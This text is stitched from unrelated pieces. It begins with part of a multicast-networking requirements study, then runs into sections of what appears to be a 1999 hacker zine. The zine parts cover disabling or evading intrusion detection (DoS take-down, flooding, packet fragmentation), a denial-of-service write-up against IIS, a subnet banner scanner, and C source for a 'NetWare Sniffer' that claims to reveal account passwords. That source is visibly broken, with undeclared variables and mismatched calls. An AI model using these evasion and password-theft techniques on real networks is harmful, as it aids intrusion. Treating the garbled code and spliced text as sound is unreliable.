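    return after_erase, after_draw
```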

3.5 Reliability Range:

As stated earlier, the user application may require a range from an
absolute guarantee that all receivers have received the data to the 
best effort reliability provided by the transmission characteristics
of the communication channel. Absolute reliability requires 
acknowledgements for all data packets transmitted and implies total
knowledge of the receiver set.  There are partial reliability 
requirements imposed by some applications such as a k-reliability 
mode wherein data transmission is successful if k receivers acknowledge
the message.  Some applications may impose the requirement that a
majority of receivers acknowledging receipt is sufficient. Another 
aspect of reliability is that of atomicity: if the message is 
delivered to any in the receiver set then it must be delivered to 
all members of the set. This could be the case, for example, in a
distributed database application where consistency is an important
requirement. Data may require a reliability mode of most-recent 
(or freshness) that requires reliability but only within a latency
bound (a lifetime is associated with the data).

The method of assuring reliability must be balanced against other 
requirements placed by the user on the communication channel. This 
may become a negotiated function between the user application and the
underlying communication channel. In addition, the definition of 
reliability may have to be established by either the user application 
as a multicast sender or the user application as a multicast receiver. 

3.6 Quality of Service (QoS):

A QoS capability might make use of a resource reservation mechanism 
which permeates the communication protocol layers such that a certain
level of performance is guaranteed. QoS parameters include latency,
throughput, jitter, precedence, reliability and capacity. 
Applications that don't require QoS are satisfied with only best 
effort delivery services.

The characteristics required by the user application of the 
communication channel may be defined as individual items or they 
could make up a single QOS requirement that is passed from the 
user application to the underlying communication channel architecture.
A standard format may be required so that each user application 
is not required to develop their format for defining specific 
characteristics for the communication channel.

3.6.1 Communication Channel Throughput:

The user application may require that the communication channel 
support a required transmission rate, or throughput, from a 
sender to either a single or multiple receivers.  The throughput
rate might be expressed as a burst rate and/or a sustained rate.
The rate reflects the applications ability to inject traffic 
into the network.  The acceptable rate might vary depending on 
the available resources, for example, a video conference over 
a T1 circuit might specify its requirement as a 128 Kbps service;
whereas, the same conference over an ATM circuit might require 1
Mbps service.  This reflects the fact that the user's perception
of a required  QoS might change relative to his knowledge of the 
resources available.  The ability of the communication channel to 
support a specific transmission rate may require negotiation between
the user application and the underlying communication channel.

3.6.2 Communication Channel Latency:

The user application may require that data transmitted by the sender
must be received by either a single receiver or multiple receivers 
within a specific delay. The latency could be expressed on a
per-session or per-message basis. The application can indicate 
the minimum delay that will be noticeable to the application. This
provides information to the negotiation process that can then 
determine when to cease the negotiation for the requested latency.
The distance from sender to receiver will strongly influence 
achievable delay, thus, the application may need to negotiate the 
delay parameter depending on the communication path available.

3.6.3 Communication Channel Jitter:

Jitter is the variation in the end-to-end delay caused principally
by media access delays and queueing delays.  Jitter can be 
compensated for by adding a variable delay at the receiver. 
Jitter is a concern for streams (like audio and video) that 
require synchronization. Jitter is also an indication of the 
amount of congestion in the net and may provide important feedback 
to the QoS mechanisms.

3.6.4 Precedence/Priority

Applications often need to expedite delivery of certain messages.
This could be on a per-session basis or on a per-message basis. 
Some applications need to define the importance of their data 
according to a system-wide scheme.  If the network media supports
priorities and the operating system is capable of real-time 
performance, end-to-end delays can be bound.

3.6.5 Reliability

Forward error correction (FEC) techniques are used to guard
against errors by including with the data transmissions redundant
data bits which can be used by the receiver to detect, and, in
some cases, correct, certain bit errors.  FEC provides reliability
at the expense of channel bandwidth and transit delay, but is
helpful when applications cannot tolerate retransmissions.

The error characteristics of the communication channel determine 
the degree of redundancy required.  Noisier channels require more
redundancy.  The QoS parameter of reliability, therefore, is 
communication channel dependent.

3.6.6 Capacity

The QoS throughput parameter dictates a certain network level 
capacity.  For example, a video conference might specify a
throughput requirement of 1 Mbps.  The network QoS mechanism 
would need to choose a capacity range above 1 Mbps.  The 
communication environment, however, might limit the application
to a certain capacity, therefore, this parameter is also
communication channel dependent. 

4.0 Applications:

There are many different user applications that could be specified 
as using data transmission protocols. They have been developed 
to meet different mission requirements; however, as a combined 
group, they could have common or different requirements for the 
communication channel based on the need of a specific mission 
requirement. Rather than look at the requirements for the user 
application as defined in a specific mission, the user application's 
data transmission requirements can be generalized in terms of the
type of data to be transferred.  These data types are:
         
 a.  Text Message/Email
 b.  File/Image Data Exchange
 c.  Voice/Video Conference 
 d.  Voice/Video Broadcast
 e.  Interactive Multi-Media
 f.  Time-sensitive Data Exchange
 g.  Time-critical Data Exchange
 h.  Replicated Data Base

It is helpful to map military applications in each of these
classes to commercial applications:


Generic Application      Commercial Applications             Military Applications
--------------------------------------------------------------------------------
Text Messaging/Email     Email, News, WWW                    DMS, JMCIS, GCCS, APS
File/Image               Weather maps (imm)                  JMCIS, GCCS, DMS
Conference               vic, vat, wb                        VTIXS
Broadcast                public radio, freeway traffic       JDISS, JMCIS
Interactive Multimedia   vic, vat, wb                        GCCS
Time-sensitive           virtual games, stock quotes         JMCIS
Time-critical            air traffic control, stock quotes   combat systems
Realtime DB              distributed process, stock quotes   JMCIS

In the sections that follow, each application is evaluated according 
to the characteristics chart developed previously.  It is not possible
for the project to address each of these applications or application
classes.  The project's focus will be limited to non-realtime
applications like bulk file transfer.

4.1 Text messaging/Email

4.1.1 Application Use

Applications in this category include official organizational messages,
email, message paging, facsimile, bulletin board, and newsgroups.
X.400 email is the prototypical application in this category and
is characterized by traffic that is not sensitive to throughput or
delay, but is sensitive to errors, i.e. it needs reliable transfer.
The reliability, however, may be provided immediately or delayed due 
to the inability of the receiver to acknowledge in circumstances where
the return channel is disabled or unavailable.  For this reason an
unreliable multicast must be provided in addition to a reliable 
multicast capability.  In fact, a hybrid is needed such that when a
message is multicast to a group some members of the group can be
expected to acknowledge immediately and others may have to provide 
for their own reliability by enlisting the services of a logging agent 
or other means.

Email could be sent between individuals or from an individual to a 
group or organization. Messages of varying priority require a range 
of guaranteed delivery speeds.  This range, reflected in the accompanying 
chart, is typically from a couple of seconds to hours. 

4.1.2 Communication Requirements


Characteristic:                                          Range of Values:
--------------------------------------------------------------------------

Group Management                                        Known
Topology                                                PT->MP
Scalability                                             100
Ordering                                                Source
Reliability Range                                   Absolute
QoS
   Throughput                                          3 Mbps
   Latency                                  per-message: 2 secs. to hours
   Jitter                                                  no requirement
   Precedence/Priority                               Per-message
   Reliability                         communication channel dependent
   Capacity                             communication channel dependent


4.2. Text and Image File Transfer

4.2.1 Application Use

Applications in this category include image/file archive/retrieval, 
the distribution of weather maps, distribution of key management  
and other databases. (Also, web cache preload, software dissemination,
network news, pre-loading of a database for DIS or games).  A typical
application is non-realtime bulk data transfer such as the retrieval 
of an image from an archive.  These applications fit a client/server in
that the receiver can be the client of a server...the transmitter.  
The data flow in these applications is unidirectional.  No hierarchiacal
distribution system is needed.   Characteristics not (particularly) 
delay sensitive but error sensitive. File sizes are great.  In some 
cases, files must be dealt with as monolithic. Transfers on the order 
of tens of seconds are tolerated. Image files require very low error 
rates. Compression is necessary.  Since there is no interaction, users 
do not perceive round-trip delays or excessive latencies.

4.2.2 Communication Requirements

Characteristic:                                         Range of Values:
--------------------------------------------------------------------------

Group Management                                        Unknown
Topology                                                PT->MP
Scalability                                             1000
Ordering                                               Source
Reliability Range                                        k-reliability
QoS
   Throughput                                           10 Kbps
   Latency                                              no requirement
   Jitter                                                no requirement
   Precedence/Priority                                 Per-message
   Reliability                           communication channel dependent
   Capacity                              communication channel dependent


4.3 Voice/Video Teleconference

4.3.1 Application Use

Voice/video teleconferences impose soft real-time constraints on the 
communication system. Latency is the principal concern because of 
human perception limitations. Reliability is not a principal concern
since data is redundant and is dependent more on freshness.  Loss of
video data transmission, for example, may result in slight differences
in color or a fuzzy picture. There is no state to maintain or distribute
since audio/video consists of a stream of transition states.  

Depending on the quality of signals transmitted, throughput demands 
can be very high. Telephony quality voice, for example, demands only
64 Kbps, while to transmit NTSC video of 30 frames a second, could 
require a full FDDI level of 100 Mbits/sec. Compression is typically 
used to lower this throughput requirement. The distribution of this 
type of data does require the reserving of net resources for the purpose
of assuring a QoS level where, typically, latency and jitter are the 
constraints.

Video teleconference requires group formation policy that allows 
initiating a session, joining existing sessions, leaving a session
without tearing it down if any participants remain connected, and
terminating the session.  It requires the capability to conduct a
tightly-controlled N X N session if the number of participants is 
restricted; or, a loosely-controlled session in a session from 1 to
N where the number of participants may be quite large. In any case,
control over group membership must be available.

4.3.2 Communication Requirements

Characteristic:                                       Range of Values:
------------------------------------------------------------------------

Group Management                                        Known
Topology                                                MP<->MP
Scalability                                             15
Ordering                                                Causal
Reliability Range                                           best effort
QoS
   Throughput                                       64 Kbps - 1 Mbps
   Latency                                           1 sec.
   Jitter                                                125 ms.
   Precedence/Priority                             per-session
   Reliability                          communication channel dependent
   Capacity                             communication channel dependent

4.4 Voice/Video Broadcasting

4.4.1 Application Use

The broadcasting of voice and video differs from the VTC in its
requirements since there is no need to provide a return channel 
from the receivers to the transmitter.  The non-interactive nature
also imposes less stringent demands for latency and jitter.  Digital
video and audio require periodic updates of information to prevent
the image or voice playback from degrading.


4.4.2 Communication Requirements

Characteristic:                                         Range of Values:
--------------------------------------------------------------------------

Group Management                                     Known
Topology                                             PT->MP
Scalability                                          1000
Ordering                                             Causal
Reliability Range                                          best effort
QoS
   Throughput                                        64 Kbps - 1 Mbps
   Latency                                           5 secs
   Jitter                                                    1 sec.
   Precedence/Priority                               per-session
   Reliability                            communication channel dependent
   Capacity                               communication channel dependent


4.5 Interactive multimedia

4.5.1 Application Use

Collaborative work tools, planning tools and distributed whiteboards 
are examples of interactive multimedia applications.  A distributed 
whiteboard is a conferencing tool that distributes pages of a 
whiteboard such that any participant can draw on any page. The goal 
is to have consistent views across multiple platforms, therefore, the
processes implementing the whiteboard must exchange the current state
of the data.  The operations that any participant performs on a page
must be sequenced and timestamped.  Each participant is both sender 
and receiver.  Each member is responsible for detecting loss and reporting
this to the group and for periodically informing the group of their 
place in the session.  Repair requests could be multicast to the group
and any member of the group could effect repair.  This, in turn, 
requires the members of the group to have some concept of the distance 
to each participant in the group and to invoke an algorithm for repair 
that minimizes responses to repairs. This can be satisfied by timestamping 
the status information multicast to the group. Priority is utilized to
determine the importance of transmitting the current page, a new page, 
or repairs to a previous page.   

Data in these applications are characterized as reliable, duplicate 
free, ordered by source,  and delivered within a finite period of time.

4.5.2 Communication Requirements

Characteristic:                                       Range of Values:
-------------------------------------------------------------------------

Group Management                                        Known
Topology                                                MP<->MP
Scalability                                             15
Ordering                                             Causal
Reliability Range                                    Absolute
QoS
   Throughput                                         64 Kbps - 1 Mbps
   Latency                                            150 ms.
   Jitter                                             .125 ms.
   Precedence/Priority                             per-session
   Reliability                             communication channel dependent
   Capacity                                communication channel dependent

4.6.  Time-Sensitive Data Exchange

4.6.1 Application Use

Distributed simulations, situational awareness, virtual reality gaming,
billing distribution, and the dissemination of stock quotes are examples
of real-time data exchanges in this category. Soft real-time means that
the applications are time sensitive (as opposed to hard real-time which
are time critical).

Any virtual environment among hosts in a distributed system that are 
simulating the behavior of objects in that environment fit this category.
Applications like distributed gaming and virtual reality require that 
terrain and environmental updates be distributed in a multicast fashion
with low packet loss and low latency.  Objects in this environment are
capable of physical interaction and can sense each other by visual and
other (sensor) means.

These applications are characterized by large scale memberships which
need to share a consistent view of the game space even in the face of
packet loss.  In entertainment scenarios the number of simulated 
objects could exceed 100,000 where each object produces a realtime
flow of 15 packets per second.  Unlike applications like 
videoconferencing, these applications cannot tolerate frequent 
updates of data to guarantee freshness. Freshness is required yet 
updates necessarily are infrequent for objects like terrain updates. 
These applications are intended to work with input to and output
from humans interacting with distributed simulators in real time. 
Human perception is the normal quantifier of latency requirements 
(approx. 100 milliseconds).

Loss rates are stringent but not zero which means that semi-reliable 
transfer may suffice.  Latency must be predictable on the order of a 
few hundred milliseconds and jitter must not exceed a few milliseconds. 
There must be support for reserving network resources.  Group 
communication must allow all participants to transmit to all other 
participants and the group management must allow hundreds of participants 
to join/leave in less than a second.

4.6.2 Communication Requirements

Characteristic:                                          Range of Values:
--------------------------------------------------------------------------

Group Management                                        Known
Topology                                                MP<->MP
Scalability                                             100,000
Ordering                                                Causal
Reliability Range                                               Absolute
QoS
   Throughput                                          45 Mbps - 600 Mbps
   Latency                                             150 ms.
   Jitter                                               .125 ms.
   Precedence/Priority                          per-message
   Reliability                             communication channel dependent
   Capacity                                communication channel dependent

4.7.  Time-Critical Data Exchange

4.7.1 Application Use

Air traffic control, realtime sensor systems, and combat data systems
are examples of applications in this category.

4.7.2 Communication Requirements

Characteristic:                                         Range of Values:
--------------------------------------------------------------------------

Group Management                                        Known
Topology                                                MP<->MP
Scalability                                             500
Ordering                                                Causal
Reliability Range                                      Absolute
QoS
   Throughput                                 kbps-Mbps
   Latency                                          20 ms.
   Jitter                                           10 ms.
   Precedence/Priority                         per-session
   Reliability                             communication channel dependent
   Capacity                                communication channel dependent

4.8 Replicated Data Base

4.8.1 Application Use

Distributed process control and replicated databases are in this
category.  The distinguishing requirement is the need for total order.
Application tasks could be divided among processors in a system and 
data replicated to protect against failures.  There is a need to 
coordinate the tasks and reach consensus on state. Manufacturing 
process control needs to schedule processes distributed across the
system.  A consistent database is necessary to reach consensus.

4.8.2 Communication Requirements


Characteristic:                                         Range of Values:
------------------------------------------------------------------------

Group Management                                    Known
Topology                                            MP<->MP
Scalability                                         100,000
Ordering                                            Total
Reliability Range                                          Absolute
QoS
   Throughput                                        56 Kbps - 1 Mbps
   Latency                                            1 sec
   Jitter                                             10 ms.
   Precedence/Priority                              per-message
   Reliability                             communication channel dependent
   Capacity                                communication channel dependent

			 [-------------------------------------]

kv[6]; /* Intrusion Detection Systems......................ProtocolD */ 



 INTRODUCTION

 Intrusion Detection Systems, commonly known as IDS,
 are a relatively new type of technology. In short,
 an IDS simply listens in real time for known 'hack'
 signatures within the data packets. Currently there
 are two types of IDS systems on the market: Network
 Based IDS and Host Based IDS. This article will
 attempt to explain the difference between Network
 and Host based IDS. Although there are many ways to
 analyze traffic on a network IDS, I will explore the
 possibilities of evading one of these methods, known
 as 'passive network packet capture' (sniffing).

NETWORK IDS :
     This method of detection puts your network card
     into promiscuous mode and sniffs all traffic 
     going by on the wire.

     Problems:
        Due to the fact that it must analyze all traffic
     passing by, many claim that it cannot be done effectively
     on a saturated high-speed link without dropping packets.
     Because it sniffs the traffic, it can only analyze the
     traffic on its own segment. Thus, in a switched
     environment, you will require an IDS on each segment.

HOST IDS        :
     This method examines only the traffic destined to itself. 

     Problems:
        Can only analyze the traffic destined to itself. 
        This method requires a client on each host and can
         become costly.


METHODS OF  (Network Based)

    The first problem of course is detecting a Network
    IDS system in the first place. This is possible by
    attempting to detect whether any systems on the
    network are in promiscuous mode. If one is detected,
    it could be either a sniffer or a network based IDS.
    Either way, your goal would be to take down this
    system or flood it to the point where packets begin
    to be dropped. Currently there are utilities out there
    that attempt to detect network cards in promiscuous mode.

TAKE-DOWN

  Many sniffer-based IDS systems will fail open.
  Once this happens, the attacker can continue on to its
  targeted host. This can be accomplished through any
  number of DoS attacks. It should be noted that some systems 
  are resistant to DoS attacks.




EVASION

** By-Pass via Flood
If the network based IDS cannot be taken off line, another
possible approach would be to flood the system to the point
where it is dropping packets. Once this occurs, it may be 
possible to then send the actual attack to the desired target 
with hopes that the IDS system will drop the packet and 
therefore not be able to detect the signature contained
within it.

** Forgery & Fragmentation
Typically an IDS system examines packets and compares 
their contents to known attack signatures. If the packet
can be forged or fragmented properly, it then may be possible
to by-pass the IDS. Many IDS's cannot reassemble fragmented
packets and compare them to their list of signatures, thus 
allowing a malicious attack by. Once the fragments reach the 
destined host, they are reassembled and a successful 
attack is made.
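
Why reassembly matters for a signature matcher, as an added example
(not code from this article or from any IDS product): a constructed
signature is split across three constructed IPv4 fragments, and a
per-packet matcher is compared with one that reassembles before
matching and flags overlapping fragments. All names, the TEST-NET
addresses and the signature are assumptions made for the example.

```python
import struct
from collections import defaultdict

# Constructed signature for the example; not taken from any real rule set.
SIGNATURES = {b"KV-DEMO-SIGNATURE": "constructed-demo-signature"}
IP_HDR = struct.Struct("!BBHHHBBH4s4s")   # fixed 20-byte IPv4 header, no options
MORE_FRAGMENTS = 0x2000

def make_fragment(ident, offset, more, payload,
                  src=b"\xc0\x00\x02\x01", dst=b"\xc0\x00\x02\x02"):
    """Build a constructed IPv4 fragment; offset is in bytes, a multiple of 8."""
    flags_off = (MORE_FRAGMENTS if more else 0) | (offset // 8)
    return IP_HDR.pack(0x45, 0, 20 + len(payload), ident, flags_off,
                       64, 6, 0, src, dst) + payload

def parse(packet):
    vihl, _, total, ident, flags_off, _, proto, _, src, dst = IP_HDR.unpack_from(packet)
    header_len = (vihl & 0x0F) * 4
    return {"key": (src, dst, proto, ident),          # identifies one datagram
            "offset": (flags_off & 0x1FFF) * 8,
            "more": bool(flags_off & MORE_FRAGMENTS),
            "payload": packet[header_len:total]}

def match(data):
    return sorted(name for sig, name in SIGNATURES.items() if sig in data)

def per_packet_alerts(packets):
    """Naive sensor: looks at each packet's payload in isolation."""
    return [alert for p in packets for alert in match(parse(p)["payload"])]

class Reassembler:
    """Sensor that rebuilds each datagram before matching signatures."""

    def __init__(self):
        self.pending = defaultdict(dict)   # key -> {offset: payload}
        self.total_len = {}                # key -> length, known once last fragment seen

    def feed(self, packet):
        f = parse(packet)
        if f["offset"] == 0 and not f["more"]:
            return match(f["payload"])                 # not fragmented at all
        key, start = f["key"], f["offset"]
        end = start + len(f["payload"])
        frags = self.pending[key]
        if frags.get(start) == f["payload"]:
            return []                                  # harmless duplicate
        alerts = []
        # Overlapping fragments are ambiguous (hosts resolve them differently),
        # so the sensor reports them instead of guessing what the host will see.
        if any(start < off + len(d) and off < end for off, d in frags.items()):
            alerts.append("anomaly: overlapping fragments")
        frags[start] = f["payload"]
        if not f["more"]:
            self.total_len[key] = end
        data = self._assemble(key)
        if data is not None:
            alerts += match(data)
            del self.pending[key], self.total_len[key]
        return alerts

    def _assemble(self, key):
        if key not in self.total_len:
            return None                                # last fragment not seen yet
        buf = bytearray()
        for off in sorted(self.pending[key]):
            if off > len(buf):
                return None                            # hole: still waiting
            chunk = self.pending[key][off]
            buf[off:off + len(chunk)] = chunk
        return bytes(buf) if len(buf) >= self.total_len[key] else None

def constructed_fragments():
    payload = b"GET /KV-DEMO-SIGNATURE HTTP/1.0\r\n\r\n"
    return [make_fragment(1, 16, False, payload[16:]),   # arrives out of order
            make_fragment(1, 0, True, payload[:8]),
            make_fragment(1, 8, True, payload[8:16])]

def demo():
    frags = constructed_fragments()
    sensor = Reassembler()
    return per_packet_alerts(frags), [a for p in frags for a in sensor.feed(p)]
```

A deployed reassembler also needs a timeout and a cap on pending
datagrams, since unbounded fragment state is itself a way to push
the sensor into dropping packets.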


SUMMARY

Basically there are problems associated with each of 
these technologies. Ideally, the best solution would
have both network & host based IDS. It should also be
noted that various types of IDS's provide many types of
alerting when particular types of attacks occur. This 
could be in the form of an e-mail, page or SNMP alert.
So, if you decide to attempt to DoS the system, an alert
of the event still might be made, thus alerting them of 
suspicious activity. Also note that one method of preventing
an IDS from being detected and/or being taken down is by 
assigning the network card an address of 0.0.0.0. This 
will still enable it to sniff the traffic without being
detected, and leaves no way of directing an attack directly
at the system. It will then use a second network card to send 
off any alerts or alarms. This second network card is not in 
promiscuous mode. This type of design makes it difficult
to detect and disable the IDS system.

			 [-------------------------------------]

kv[7]; /* Another IE Exploit?.................................ntwak0 */ 

Potential DoS Attack on NT box with port 80 open
Jul 15 17:37:21 1999

(By NtWaK0 , slackette ) LOU Efnet #legions

Exploit Platform:
I did try on NT server 4.0 + IE5 but I am sure it will work with IE4.

Exploit Description :
All that you need to have is a box with 9x or NT + IE5 on it. Even FULLY
patched with, the box test was a server that run FTP anonymous and port
80
was open and an ASP pages on that web. The tester may be able to use
either
NT or 9x to facilitate this exploit.


Narrative will follow detailing steps taken.
1- Open IE5 or IE4 and Click option, then Security, NO to Cookie to
activex
and to java. In other word put your security to Maximum
2- From the start Menu Click START then RUN.
3- Type the IP address example <http://11.11.11.11/> hit enter
4-If the remote page has an asp page you will see your title bar
switching
between the two asp's. And your IE title bar will go nuts and you will
start
getting packets from the remote server.

This is what i recieved from sniffer when the server started sending.
The
default page didn't load and never loaded. If you do not stop IE you
will
recieve those packets numerous times and your link will be substantially
slowed.

GET /default.asp 47 45 54 20 2f 64 65 66 61 75 6c 74 2e 61 73 70
? HTTP/1.1.. 3f 20 48 54 54 50 2f 31 2e 31 0d 0a
Accept: image/gi 41 63 63 65 70 74 3a 20 69 6d 61 67 65 2f 67 69
f, image/x-xbitm 66 2c 20 69 6d 61 67 65 2f 78 2d 78 62 69 74 6d
ap, image/jpeg, 61 70 2c 20 69 6d 61 67 65 2f 6a 70 65 67 2c 20
image/pjpeg, app 69 6d 61 67 65 2f 70 6a 70 65 67 2c 20 61 70 70
lication/vnd.ms- 6c 69 63 61 74 69 6f 6e 2f 76 6e 64 2e 6d 73 2d
powerpoint, appl 70 6f 77 65 72 70 6f 69 6e 74 2c 20 61 70 70 6c
ication/vnd.ms-e 69 63 61 74 69 6f 6e 2f 76 6e 64 2e 6d 73 2d 65
xcel, applicatio 78 63 65 6c 2c 20 61 70 70 6c 69 63 61 74 69 6f
n/msword, */*.. 6e 2f 6d 73 77 6f 72 64 2c 20 2a 2f 2a 0d 0a
Accept-Language: 41 63 63 65 70 74 2d 4c 61 6e 67 75 61 67 65 3a
en-us.. 20 65 6e 2d 75 73 0d 0a


Server: Microsof 53 65 72 76 65 72 3a 20 4d 69 63 72 6f 73 6f 66
t-IIS/4.0.. 74 2d 49 49 53 2f 34 2e 30 0d 0a
Date: Thu, 15 Ju 44 61 74 65 3a 20 54 68 75 2c 20 31 35 20 4a 75
l 1999 21:11:12 6c 20 31 39 39 39 20 32 31 3a 31 31 3a 31 32 20
Host: 000.000.00 08 0f 00 70 3a 00 32 30 37 00 32 35 00 2e 30 30
00.. 32 0 30 30 0d 0a
Connection: Keep 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70



5- Someone could code a program to exploit this infraction, being able to
generate a Denial of Service attack on the remote box or on the local box,
where you have memory consumption due to packets received from the remote
site.


6- If you also run a sniffer you will see what the server is sending. I
received about 2 Meg of data from the server. The page never loaded, and
the only way to stop that data is to close IE.


Exploit Code :

N/A


Exploit Fix :
N/A

+---------------oOOo-(NtWaK0)-oOOo--------------------------------+


			 [-------------------------------------]

kv[8]; /* tryseg.c............................................guidob */ 

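// Test for catching SIGSEGV or SIGBUS without crashing,
// combined with try{}catch(){}
//
// Note: throwing a C++ exception out of a signal handler is undefined
// behaviour in standard C++. Whether the catch() blocks below are reached
// depends on the platform and compiler; with g++ it typically requires
// -fnon-call-exceptions.

// Guido Bakker 1999 <guidob@synnergy.net>

#include <iostream>
#include <signal.h>
#include <stdlib.h>
#if defined(__sun)
#include <siginfo.h>   // psignal() is declared here on Solaris
#endif

using namespace std;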

struct report {

    int    err;
    int    sig;
    int critval;

} page1 = { 0, 0, 0 };

void notwithme(int);
int  beyond(int);

int main(){

    int i;

    try{

            sigset(SIGSEGV,notwithme);
            sigset(SIGBUS,notwithme);
 
            for(i=10000;;i++){

                    beyond(i);

                    cout << "Survived beyond i = " << i << endl;
            }
    }
    catch(report& seite1){

            cout << "Yes we made it into the catch()" << endl;

            cout << "seite1.err is:     " << seite1.err     << endl;
            cout << "seite1.sig is:     " << seite1.sig     << endl;
            cout << "seite1.critval is: " << seite1.critval << endl;

            return(0);

    }
    catch(...){

            cout << "Came to the second catch()" << endl;

            return(1);
    }

    cout << "After the catch block" << endl;

    return(1);

}  // end of main()

int beyond(int i){

    int a[50];
    page1.critval = i;

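    // Main operation which causes an unforeseen error:
    // a[] has 50 elements and i starts at 10000, so this write lands far
    // outside the array and eventually hits an unmapped page

    a[i]=1;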

    return(1);
}

void notwithme(int sig){

    psignal(sig, "Function notwithme() got signal: ");

    page1.err = 1;
    page1.sig = sig;

    throw page1;

    return;
}

			 [-------------------------------------]

kv[9]; /* match.c..............................................icesk */

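/* by icesk HEH damn i think i've released too many scanners :> */

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>   /* inet_addr() */
#include <unistd.h>      /* alarm(), close() */
#include <string.h>
#include <signal.h>

#define TIMEOUT 3

void al4rm(int sig);

int main(int argc,char **argv)
{
    struct sockaddr_in thaddr;
    struct sigaction sa;
    int unf, i;
    ssize_t n;
    char buf3r[1024], hozt[1024];

    if(argc != 4)
    {
        printf("icesk; %s [ip mask] [port] [searchword]\n",argv[0]);
        exit(0);
    }

    /* install the handler without SA_RESTART so that alarm() really
       interrupts a blocked connect() or recv() */
    memset(&sa, 0, sizeof(sa));
    sa.sa_handler = al4rm;
    sigaction(SIGALRM, &sa, NULL);

    for(i=1;i<255;i++)
    {
        if( (unf = socket(AF_INET, SOCK_STREAM, 0) ) == -1)
        {
            printf("c4nt g3t s0ck3t!#@\n");
            continue;
        }

        /* build the address string first; the original called
           inet_addr(hozt) before hozt had been filled in */
        snprintf(hozt, sizeof(hozt), "%s.%d", argv[1], i);

        memset(&thaddr, 0, sizeof(thaddr));
        thaddr.sin_family = AF_INET;
        thaddr.sin_port = htons(atoi(argv[2]));
        thaddr.sin_addr.s_addr = inet_addr(hozt);

        alarm(TIMEOUT);
        n = -1;
        if(connect(unf, (struct sockaddr *)&thaddr, sizeof(thaddr)) == 0)
            n = recv(unf, buf3r, sizeof(buf3r) - 1, 0);
        alarm(0);
        close(unf);   /* the original leaked one descriptor per host */

        if(n > 0)
        {
            buf3r[n] = '\0';   /* recv() does not terminate the buffer */
            if(strstr(buf3r, argv[3]) != NULL)
            {
                printf("[%s!%s]; *MATCH*\n", hozt, argv[2]);
            }
        }
    }
    return 0;
}

void al4rm(int sig)
{
    (void)sig;   /* nothing to do: the signal only interrupts the blocking call */
}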

			 [-------------------------------------]

kv[10]; /* netsniff.c (reprint)..............................mnemonic */

------------------------------ begin here ------------------------------

/* NetWare Sniffer 1.0 written by Mnemonic */

#include <malloc.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <errno.h>   /* errno is set in GetObjectData() */
#include "structs.h" /* this is at the bottom of my notes in kv5 */

void GetMyAccountPassword();

int main()
{
char imthinkn;
printf("NetWare Sniffer is copyright 1998 Mnemonic, little buddy\n");
printf("Would you like to (a) get the password for the account you're\n");
printf("on now, (b) get the password of another user or application\n");
printf("or (c) quit? ");
imthinkn = getchar(); /* read the menu choice; the original never read it */
switch(imthinkn)
{
case 'a': case 'A':
GetMyAccountPassword();
break;
case 'b': case 'B':
GetObjectData();
break;
case 'c': case 'C':
return 3;
}
return 0;
}

FORWARD int GetUserAndAppInfo(char *argv[], int nMaxArgs, OBJECT *pObject,
APPLICATION_OBJECT *aop);

extern int RetrieveApplicationData(APPLICATION_OBJECT *aop);
extern FS_CONNECTION_INFO *GetConnInfo(WORD wConnectionNumber);


FORWARD OBJECT *GetObjectData(char *pszObjectName, WORD wObjectType);

GLOBAL OBJECT *GetObjectData(char *pszObjectName, WORD wObjectType)
{
int nIndex;
int nNumberObjects = 0;
OBJECT *pObject = NULL;
OBJECT obj;
int nCompletionCode;

obj.oid = -1L; /* initial value for scanbinderyobject.
must be -1L, gets updated by the function.*/
for (;;)
{
nCompletionCode = ScanBinderyObject(pszObjectName, wObjectType, &obj.oid,
obj.szObjectName, &obj.wObjectType, &obj.byPropertiesFlag, &obj.byObjectFlag,
&obj.byObjectSecurity);

if (nCompletionCode != SUCCESSFUL) /* problem or finished */
{
if (nCompletionCode != NO_SUCH_OBJECT)
{
if (pObject != NULL)
free(pObject);
errno = nCompletionCode;
return NULL;
}
break;
}
nIndex = nNumberObjects++;
pObject = (OBJECT *)
realloc(pObject, (nNumberObjects * sizeof (OBJECT)));
if (pObject == NULL)
return NULL;
/* do structure assignment to fill array element. */
pObject[nIndex] = obj;
} /* end for (;;) */
/* add dummy element */
pObject = (OBJECT *)
realloc(pObject, ((nNumberObjects + 1) * sizeof (OBJECT)));
if (pObject != NULL)
/*zero out of the dummy element. */
memset(&pObject[nNumberObjects], '\0', sizeof (OBJECT));

if (nNumberObjects == 0)
errno = NO_SUCH_OBJECT;
GetUserAndAppInfo();
return pObject; /* array of OBJECTs ending in the zeroed dummy element */
}

GLOBAL int GetUserAndAppInfo(char *argv[], int nMaxArgs, OBJECT *pObject)
{

/*GetConnectionNumber() returns a value rather than an error code so
we can use it as an input parameter to GetConnInfo(). */

if (pFSConnInfo == NULL)
return -1;

strcpy(aop->obj.szObjectName, argv[nMaxArgs - 2]);
aop->obj.wObjectType = OT_APPLICATION;
strcpy(aop->szPassword, argv[nMaxArgs - 1]);
fread(&szPassword, sizeof(int), 1, inpf);
printf("\nThe password for that account is %s\n", szPassword);
printf("\nAnd don't forget.. NetWare Sniffer is copyright 1998 Mnemonic\n");
main();
return 2;
}

void GetMyAccountPassword(char *argv[], int nMaxArgs, OBJECT *pObject)
{
FS_CONNECTION_INFO *pFSConnInfo;

pFSConnInfo = GetConnInfo(GetConnectionNumber());

if (pFSConnInfo == NULL)
return -1;

/*we have the user information in pFSConnInfo->fsLoggedObject.obj.*/

*pObject = pFSConnInfo->fsLoggedObject.obj;
free(pFSConnInfo);
strcpy(aop->obj.szObjectName, argv[nMaxArgs - 2]);
aop->obj.wObjectType = OT_APPLICATION;
strcpy(aop->szPassword, argv[nMaxArgs - 1]);
fread(&szPassword, sizeof(int), 1, inpf);
printf("\nThe password for the account you're on is %s\n", szPassword);
printf("\nAnd don't forget.. NetWare Sniffer is copyright 1998 Mnemonic\n");
main();
return 1;
}

------------------------------- end here -------------------------------

NetWare Sniffer allows you to do one of two things. You can get the
password for the account you're on, or get the password for another
object. NWS actually retrieves the 128-byte segment which represents an
object's password, and then converts this binary string into text.

To receive the password to the account you're on, we use functions in the
Connection Services. So we can call GetConnectionNumber() to get the
number that the file server has assigned to this workstation's connection
and call GetConnInfo() to get the name of the user among other information
including the password.

To get the password for another object we first have to get the name of
the object. NWS uses the function GetObjectData() which uses
ScanBinderyObject() to populate a structure of type OBJECT.
